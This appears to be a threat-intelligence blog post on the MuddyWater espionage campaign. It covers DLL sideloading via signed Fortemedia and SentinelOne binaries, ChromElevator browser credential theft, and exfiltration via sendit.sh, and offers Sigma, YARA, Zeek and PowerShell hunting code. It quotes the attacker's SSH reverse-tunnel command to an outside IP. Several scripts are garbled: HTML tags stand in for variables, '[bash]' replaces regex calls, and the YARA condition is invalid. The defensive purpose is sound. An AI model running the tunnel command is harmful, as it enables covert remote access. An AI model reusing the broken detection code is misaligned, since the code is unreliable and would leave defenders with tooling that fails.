Iranian Hackers Weaponize SentinelOne & Fortemedia Binaries In Global Espionage Campaign + Video

Introduction:

In a sophisticated cyber-espionage campaign uncovered by Symantec’s Threat Hunter Team, the Iran-linked APT group MuddyWater (also known as Seedworm, Static Kitten, and TEMP.Zagros) successfully breached at least nine high-value organizations across four continents, including a major South Korean electronics manufacturer where attackers maintained undetected access for an entire week in February 2026. The campaign’s most alarming technical innovation lies in its abuse of legitimate, signed binaries from Fortemedia (fmapp.exe) and SentinelOne (sentinelmemoryscanner.exe) to sideload malicious DLLs, effectively turning trusted software—including a component from a leading EDR solution—into an unwitting accomplice in the attack chain.

Learning Objectives:

Master DLL sideloading detection by analyzing legitimate signed binary abuse and identifying anomalous process relationships involving fmapp.exe, sentinelmemoryscanner.exe, and node.exe
Implement comprehensive hunting strategies to detect ChromElevator credential theft, PowerShell-based reconnaissance, and SOCKS5 tunneling for lateral movement
Deploy custom YARA and Sigma rules alongside network monitoring for sendit.sh exfiltration traffic to disrupt MuddyWater’s living-off-the-land tactics

You Should Know:

Understanding the Attack Chain: From RDP Access to Node.js-Driven Persistence

The initial access vector in documented intrusions involved Terminal Services/RDP login, followed by the establishment of an SSH tunnel for covert command and control. Huntress analysts observed attackers using the following SSH command to create a reverse tunnel:

`C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no hunter@185[.]185[.]71[.]185 -2 -4 -N -R 10841`

What makes this campaign particularly noteworthy is the prominent role of Node.js in orchestrating malicious activity. Symantec researchers noted that “the early PowerShell process tree was unusual in that node.exe, the Node.js runtime, appeared as an ancestor of cmd.exe, suggesting that a Node.js script was already running on the host at the time and that it, rather than a human operator, was driving the activity”. This node.exe-based implant chain deployed PowerShell scripts responsible for reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunneling.

To hunt for similar activity across your environment, deploy the following PowerShell one-liner to identify suspicious process ancestry involving node.exe:

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object {$<em>.Message -match "node.exe"} | ForEach-Object { $</em>.Message } | Out-File C:\ThreatHunt\node_ancestry.txt

Additionally, monitor for instances where PowerShell is spawned with `-EncodedCommand` parameters originating from unexpected parent processes. The following Sysmon configuration snippet can help log these critical process creation events:

<Sysmon schemaversion="4.22">
<EventFiltering>
<ProcessCreate onmatch="include">
<ParentImage condition="end with">node.exe</ParentImage>
<Image condition="end with">powershell.exe</Image>
</ProcessCreate>
</EventFiltering>
</Sysmon>

Abusing Trust: Sideloading Signed Binaries for Malicious DLL Execution

The cornerstone of this campaign’s evasion strategy involves DLL sideloading using two digitally signed, legitimate binaries. Attackers placed malicious DLLs alongside these trusted executables to exploit Windows’ DLL search order:

fmapp.exe (legitimate Fortemedia audio-driver utility) → sideloads fmapp.dll containing ChromElevator
sentinelmemoryscanner.exe (signed SentinelOne security component) → sideloads sentinelagentcore.dll containing ChromElevator

“Using a signed SentinelOne component to load malicious code creates a situation where the very tool organizations rely on for endpoint protection becomes part of the attack chain,” researchers emphasized. The choice is deliberate: security teams often exclude their own EDR processes from scrutiny, granting implicit trust to binaries from SentinelOne, CrowdStrike, and similar vendors.

To detect this exact technique, deploy the following Sigma rule (YAML format) in your SIEM environment to alert on suspicious DLL loads from these binaries:

title: MuddyWater DLL Sideloading Detection
id: 8f4a3b2c-1d6e-4a9f-8b3c-5e7f9a2b4c6d
status: experimental
description: Detects DLL sideloading via fmapp.exe or sentinelmemoryscanner.exe
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 7
Image|endswith:
- '\fmapp.exe'
- '\sentinelmemoryscanner.exe'
ImageLoaded|endswith:
- '\fmapp.dll'
- '\sentinelagentcore.dll'
condition: selection
falsepositives:
- Authorized Fortemedia or SentinelOne software updates
level: high

For immediate triage across your Windows fleet, run this PowerShell command to scan for the malicious file pairs:

Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Include "fmapp.exe","sentinelmemoryscanner.exe" | ForEach-Object {
$directory = $<em>.DirectoryName
if ((Test-Path "$directory\fmapp.dll") -or (Test-Path "$directory\sentinelagentcore.dll")) {
Write-Host "Potential sideloading detected in: $directory" -ForegroundColor Red
Get-ChildItem $directory -File | Where-Object {$</em>.Name -match "fmapp.dll|sentinelagentcore.dll"} | Format-List 
}
}

3. Bypassing Chrome’s App-Bound Encryption: ChromElevator in Action

The malicious DLLs deployed by MuddyWater contained ChromElevator, an open-source post-exploitation tool designed specifically to bypass Google Chrome’s App-Bound Encryption (ABE) protection. According to iThome’s analysis, this capability allows attackers to “steal passwords, cookies, and payment data stored in browsers” by operating within the browser’s security context.

ChromElevator operates as a two-stage system where an injector orchestrates process creation and payload delivery, while the payload executes within the browser’s security context to perform decryption and data extraction. Organizations should implement monitoring for anomalous access to Chrome’s Local State file and the `User Data` directory from unexpected processes. The following PowerShell script can detect unauthorized Chrome profile access:

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=11} | Where-Object {
$<em>.Message -match "Local State" -or $</em>.Message -match "Cookies" -or $<em>.Message -match "Login Data"
} | Where-Object {
$</em>.Message -notmatch "C:\Program Files\Google\Chrome\Application\chrome.exe"
} | Select-Object TimeCreated, @{Name="Process";Expression={[bash]::match($_.Message, 'ProcessGuid: {(.?)}').Groups[bash].Value}}

To proactively defend against ChromElevator-style attacks, security teams should deploy YARA rules targeting the tool’s unique byte sequences. A basic YARA rule to detect ChromElevator payloads:

rule ChromElevator_Detect {
meta:
description = "Detects ChromElevator credential stealer"
author = "Threat Intelligence Team"
date = "2026-05-26"
strings:
$s1 = "Chrome-App-Bound-Encryption-Decryption" wide ascii
$s2 = "IElevator" wide ascii
$s3 = "DecryptMasterKey" wide ascii
$hash = "SHA-256"
condition:
2 of ($s)
}

Living Off the Land: PowerShell Reconnaissance and Credential Theft

Once inside victim networks, MuddyWater operators leveraged PowerShell for extensive discovery and credential harvesting operations. Symantec’s report documented attacks using PowerShell scripts for “reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunneling”.

Threat hunters should look for specific command-line artifacts observed in MuddyWater intrusions, including typos that ironically serve as potential indicators, such as `whoami /pric` instead of whoami /priv. The following Splunk query can help identify suspicious PowerShell activity indicative of MuddyWater’s TTPs:

index=windows EventCode=4104
| where ScriptBlockText contains "Get-Screenshot" OR ScriptBlockText contains "reg save" OR ScriptBlockText contains "Invoke-Socks5Proxy"
| table _time, ComputerName, UserName, ScriptBlockText
| sort - _time

For credential theft specifically, monitor for attempts to access the SAM, SECURITY, and SYSTEM registry hives. The following Sigma rule detects such activity:

title: Suspicious Registry Hive Access
id: b7e8c4d9-3f2a-4b8e-9c1d-6a4f8e2b5c7a
logsource:
product: windows
service: security
detection:
selection:
EventID: 4663
ObjectType: "File"
ObjectName|contains:
- "\SAM"
- "\SECURITY"
- "\SYSTEM"
condition: selection
level: high

Exfiltration Through Consumer Cloud Services: The sendit.sh Vector

To blend malicious traffic with normal activity and evade network detection controls, MuddyWater exfiltrated stolen data using sendit[.]sh, a legitimate public file-sharing service. This technique represents a growing trend among APT groups who recognize that many organizations lack granular visibility into outbound connections to consumer-grade cloud platforms.

To detect this specific exfiltration vector, implement network monitoring rules that flag outbound connections to `sendit.sh` and similar file-sharing domains from production servers, workstations, and critical assets. A Zeek (formerly Bro) script snippet to generate alerts:

event http_request(c: connection, method: string, original_URI: string, version: string, host: string)
{
if (host == "sendit.sh" || host == "transfer.sh" || host == "file.io")
{
local f = fmt("%s made a connection to %s", c$id$orig_h, host);
NOTICE([$note=Exfiltration_Via_File_Sharing, $msg=f, $conn=c]);
}
}

Additionally, monitor for suspicious high-volume outbound traffic to these services during off-hours. The following PowerShell script queries network connection events from the last 7 days for potential exfiltration patterns:

$exfilDomains = @("sendit.sh", "transfer.sh", "file.io", "anonfiles.com")
$events = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=3} -MaxEvents 1000
$events | Where-Object {
$<em>.Message -match ($exfilDomains -join "|")
} | ForEach-Object {
$details = [bash]@{
Timestamp = $</em>.TimeCreated
SourceIP = [bash]::match($<em>.Message, 'SourceIp: ([\d.]+)').Groups[bash].Value
DestIP = [bash]::match($</em>.Message, 'DestinationIp: ([\d.]+)').Groups[bash].Value
Process = [bash]::match($_.Message, 'Image: (.+)').Groups[bash].Value
}
$details
}

What Undercode Say:

Key Takeaway 1: Trust as a vulnerability. MuddyWater’s abuse of signed SentinelOne binaries demonstrates that even trusted security tools can be weaponized. Organizations must apply zero-trust principles to EDR telemetry and implement DLL sideloading detection across all processes, regardless of vendor reputation.
Key Takeaway 2: Automation enables stealth. The use of Node.js scripts to orchestrate PowerShell activity, rather than manual operator commands, represents a significant operational maturity upgrade for MuddyWater, making their intrusions harder to distinguish from legitimate automated processes.

Analysis: This campaign marks a concerning evolution in MuddyWater’s tradecraft. Previously characterized by noisy, operator-driven attacks, the group has shifted toward highly disciplined, automated operations that abuse legitimate software components to evade detection. The geographic expansion beyond the Middle East into Asia, Europe, and the Americas signals broader Iranian intelligence priorities focused on industrial and intellectual property theft. The 90-second beaconing cadence and implant-driven access patterns suggest these intrusions are designed for long-term data collection rather than rapid smash-and-grab operations, meaning many victim organizations may still have undetected MuddyWater access active within their networks.

Prediction: Within the next 6-12 months, expect to see copycat groups adopting MuddyWater’s playbook, particularly the technique of weaponizing EDR vendor binaries for DLL sideloading. This will force a paradigm shift in endpoint detection strategies, requiring security teams to implement process ancestry analysis and cryptographic hash verification for all signed binaries executing in enterprise environments. Organizations that fail to update their detection logic to identify anomalous behavior rather than relying on signature-based vendor trust will face significant exposure to this emerging class of supply chain-style evasion techniques.